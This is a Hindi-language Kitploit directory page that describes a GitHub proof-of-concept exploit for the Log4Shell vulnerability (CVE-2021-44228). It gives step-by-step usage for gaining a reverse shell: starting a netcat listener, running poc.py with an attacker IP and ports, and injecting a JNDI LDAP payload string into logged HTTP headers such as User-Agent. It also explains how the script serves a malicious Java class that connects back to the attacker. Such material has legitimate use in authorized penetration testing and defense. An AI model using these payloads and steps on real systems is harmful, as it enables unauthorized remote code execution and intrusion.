Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
log4j-shell-poc — CVE-2021-44228 भेद्यता के लिए एक Proof-of-Concept। | Kitploit
उपकरण/GitHubGitHub/jiahong-guan/log4j-shell-poc
पेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubjiahong-guan/log4j-shell-poc

log4j-shell-poc

CVE-2021-44228 भेद्यता के लिए एक Proof-of-Concept।

रिपॉजिटरी देखें
161 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

log4shell-poc (CVE-2021-44228)

Log4j भेद्यता (CVE-2021-44228) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जिसे Log4Shell के नाम से भी जाना जाता है। यह टूल एक दुर्भावनापूर्ण Java क्लास उत्पन्न करता है, एक LDAP रेफरल सर्वर शुरू करता है, और पेलोड को HTTP के माध्यम से सर्व करता है, जिससे दूरस्थ हमलावर किसी भेद्य लक्ष्य पर मनमाने कमांड निष्पादित कर सकता है।

Features

  • डिफ़ॉल्ट बाइंड IP के रूप में स्थानीय IPv4 पते का स्वचालित पता लगाना।
  • बंडल JDK 1.8.0_20 समर्थन (अनुशंसित) जिसमें सिस्टम Java पर फ़ॉलबैक होता है।
  • इनलाइन रिवर्स शेल पेलोड (नेटकैट लिसनर से वापस कनेक्ट होता है)।
  • उत्पन्न फ़ाइलों की स्वच्छ संकलन और सफाई।

Requirements

  • Python 3.6 या उच्चतर
  • निम्नलिखित फ़ाइलें/निर्देशिकाएँ poc.py के समान फ़ोल्डर में मौजूद होनी चाहिए:
    • jdk1.8.0_20/ – Oracle JDK 1.8.0_20 की एक प्रति (इसमें bin/javac और bin/java शामिल हैं)। यदि यह अनुपस्थित है, तो स्क्रिप्ट सिस्टम के javac और कमांड का उपयोग करने का प्रयास करेगी।
java
  • target/marshalsec-0.0.3-SNAPSHOT-all.jar – LDAP सर्वर शुरू करने के लिए उपयोग की जाने वाली marshalsec JAR फ़ाइल।
  • Installation

    1. इस रिपॉजिटरी को क्लोन या डाउनलोड करें।
    2. jdk1.8.0_20 फ़ोल्डर और marshalsec JAR को ऊपर वर्णित अनुसार रखें।
    3. Python निर्भरताएँ स्थापित करें:
      root@kitploit:~
      pip install -r requirements.txt
      

    Usage

    स्क्रिप्ट को Python के साथ चलाएँ:

    root@kitploit:~
    python3 poc.py [OPTIONS]
    

    Command-line arguments

    ArgumentTypeDefaultDescription
    --useripstringauto-detected IPv4वह IP पता जिससे LDAP और HTTP सर्वर बाइंड होंगे और जिसे प्रचारित करेंगे। यह लक्ष्य मशीन से पहुंच योग्य होना चाहिए।
    --webportinteger8000उस HTTP सर्वर के लिए पोर्ट जो संकलित Exploit.class को सर्व करता है।
    --lportinteger9001वह पोर्ट जहाँ आपका नेटकैट लिसनर रिवर्स शेल की प्रतीक्षा करता है। पेलोड userip:lport पर वापस कनेक्ट होगा।

    Example

    1. अपने हमलावर मशीन पर नेटकैट लिसनर शुरू करें (9001 को अपने चुने हुए पोर्ट से बदलें):

      root@kitploit:~
      nc -lvnp 9001
      
    2. एक्सप्लॉइट चलाएँ:

      root@kitploit:~
      python3 poc.py --userip 192.168.1.10 --webport 8080 --lport 9001
      

      यदि आप --userip हटाते हैं, तो स्क्रिप्ट स्वचालित रूप से आपकी मशीन का प्राथमिक IPv4 पता उपयोग करेगी।

    3. स्क्रिप्ट भेद्य लक्ष्य में इंजेक्ट करने के लिए एक पेलोड स्ट्रिंग प्रदर्शित करेगी, उदाहरण के लिए:

      root@kitploit:~
      ${jndi:ldap://192.168.1.10:1389/a}
      
    4. इस स्ट्रिंग को किसी भी इनपुट फ़ील्ड या HTTP हेडर में इंजेक्ट करें जिसे भेद्य Log4j इंस्टेंस द्वारा लॉग किया जाता है (जैसे, User-Agent, X-Forwarded-For, आदि)। लक्ष्य LDAP सर्वर से कनेक्ट होगा, HTTP सर्वर से दुर्भावनापूर्ण क्लास प्राप्त करेगा, और रिवर्स शेल निष्पादित करेगा।

    5. आपको अपने नेटकैट लिसनर में एक शेल कनेक्शन दिखाई देना चाहिए।

    How it works

    1. स्क्रिप्ट Exploit.java उत्पन्न करती है जिसमें userip:lport पर रिवर्स शेल खोलने वाला कोड होता है।
    2. यह प्रदान किए गए JDK (या सिस्टम javac) का उपयोग करके फ़ाइल संकलित करती है।
    3. यह एक LDAP सर्वर (marshalsec के माध्यम से) शुरू करती है जो JNDI लुकअप को HTTP सर्वर के संदर्भ के साथ उत्तर देता है।
    4. यह संकलित Exploit.class को होस्ट करने के लिए webport पर एक सरल HTTP सर्वर शुरू करती है।
    5. जब कोई भेद्य लक्ष्य इंजेक्ट किए गए पेलोड के साथ JNDI लुकअप करता है, तो यह क्लास को डाउनलोड और निष्पादित करता है, जिससे हमलावर को रिवर्स शेल मिल जाता है।

    Important notes

    • रिवर्स शेल पेलोड /bin/sh का उपयोग करता है और Unix-जैसे लक्ष्य प्रणालियों के लिए है। Windows लक्ष्यों के लिए, आपको Exploit.java के अंदर कमांड को संशोधित करना होगा।
    • बंडल JDK 1.8.0_20 अनुशंसित है क्योंकि बाद के संस्करण इस एक्सप्लॉइट द्वारा उपयोग की जाने वाली JNDI रिमोट क्लास लोडिंग सुविधा को अवरुद्ध कर सकते हैं।
    • सुनिश्चित करें कि फ़ायरवॉल निर्दिष्ट पोर्ट (webport और lport) पर आने वाले कनेक्शन की अनुमति देते हैं, और लक्ष्य आपकी मशीन तक पहुँच सकता है।

    Cleanup

    स्क्रिप्ट बाहर निकलते समय (सामान्य रूप से या KeyboardInterrupt के बाद) स्वचालित रूप से Exploit.java और Exploit.class को हटा देती है। यदि आपको डिबगिंग के लिए फ़ाइलों को रखने की आवश्यकता है, तो poc.py में finally ब्लॉक को कमेंट करें।

    Disclaimer

    यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। उन प्रणालियों के विरुद्ध इस एक्सप्लॉइट का अनधिकृत उपयोग अवैध है जिनके स्वामी आप नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है। इस सॉफ़्टवेयर के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं हैं।

    Credits

    • मूल PoC kozmer द्वारा
    • Marshalsec mbechler द्वारा
    • Log4j भेद्यता अलीबाबा क्लाउड सुरक्षा टीम द्वारा खोजी गई
    टूल डाउनलोड करें